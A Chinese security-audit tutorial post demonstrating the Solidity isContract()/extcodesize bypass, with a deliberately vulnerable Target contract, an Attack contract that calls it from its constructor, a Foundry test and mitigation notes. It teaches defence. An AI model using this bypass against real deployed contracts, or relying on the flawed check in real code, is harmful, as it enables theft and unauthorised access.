Solidity&Foundry 安全审计测试 绕过isContract()校验

名称:

绕过isContract()校验

https://github.com/XuHugo/solidityproject/tree/master/vulnerable-defi

描述:

出于安全原因,某些智能合约方法被定义为只接受来自外部自有账户(EOA)的调用,而不接受来自其他智能合约的调用。

依赖于extcodesize方法来实现检查存储代码的大小,我们可以确定给定地址是已部署的智能合约还是账户(EOA),但是这存在漏洞,很容易被攻击者绕过。

在合约构造函数执行期间,被部署的智能合约的extcodesize将返回零。在智能合约创建过程结束之前,地址中不存在代码。

过程:

1、部署Target 合约。

2、部署Attack合约 ,使用foundry模拟攻击。在Attack构造函数内部,Target被调用了Protected()方法。鉴于Attack仍在其部署过程中,在isContract()方法中检查的Attack地址的extcodesize为零。这样,Attack合约就有可能绕过这个检查并成功进行攻击。

解决方法:

检查目标地址是否未未合约是有用的,例如,防止用户将资金或代币转移到可能使其永久锁定的合约中。当函数出于安全原因要求调用者是帐户(EOA)时,我们应该避免依赖此方法。

如果目的是防止来自其他合约的调用,(tx.Origin == msg.sender)可以使用,尽管它也有缺点和潜在的漏洞。

合约:

javascript 复制代码
contract Target {
    function isContract(address account) public view returns (bool) {
        // This method relies on extcodesize, which returns 0 for contracts in
        // construction, since the code is only stored at the end of the
        // constructor execution.
        uint size;
        assembly {
            size := extcodesize(account)
        }
        return size > 0;
    }

    bool public pwned = false;

    function protected() external {
        require(!isContract(msg.sender), "no contract allowed");
        pwned = true;
    }
}
javascript 复制代码
contract Attack {

    bool public isContract;

    address public addr;

    constructor(address _target) {

        isContract = Target(_target).isContract(address(this));

        addr = address(this);

        Target(_target).protected();
    }
}

foundry合约:

javascript 复制代码
function testBypassContractCheck() public {
    console.log("Before exploiting, protected status of TargetContract:", TargetContract.pwned());

    AttackerContract = new Attack(address(TargetContract));

    console.log("After exploiting, protected status of TargetContract:", TargetContract.pwned());

    console.log("Exploit completed");
}
相关推荐
IT研究所9 小时前
IT 资产管理 (ITAM) 与 ITSM 协同实践:构建从资产到服务的闭环管理体系
大数据·运维·人工智能·科技·安全·低代码·自动化
听麟13 小时前
HarmonyOS 6.0+ 跨端会议助手APP开发实战:多设备接续与智能纪要全流程落地
分布式·深度学习·华为·区块链·wpf·harmonyos
诸葛务农16 小时前
iPhone Face ID的安全隔离区和神经网络引擎及其用于人形机器人的实践(下)
神经网络·安全·iphone
开开心心就好16 小时前
免费轻量电子书阅读器,多系统记笔记听书
linux·运维·服务器·安全·ddos·可信计算技术·1024程序员节
龙亘川17 小时前
城管住建领域丨市政设施监测功能详解(2)——桥梁设施监测:筑牢桥梁结构安全防线
安全·城管住建领域·桥梁设施
菩提小狗17 小时前
第15天:信息打点-主机架构&蜜罐识别&WAF识别&端口扫描&协议识别&服务安全_笔记|小迪安全2023-2024|web安全|渗透测试|
笔记·安全·架构
TechubNews17 小时前
燦谷(Cango Inc)入局AI 資本重組彰顯決心
大数据·网络·人工智能·区块链
coding随想18 小时前
揭秘V8引擎的类型混淆漏洞:安全开发的警示与启示
网络·安全
程序边界18 小时前
数据库MySQL兼容版权限隔离深度体验:从兼容到安全增强的实战之路
数据库·mysql·安全
武汉庞小锋19 小时前
微信模板消息不稳定问题
安全·信息与通信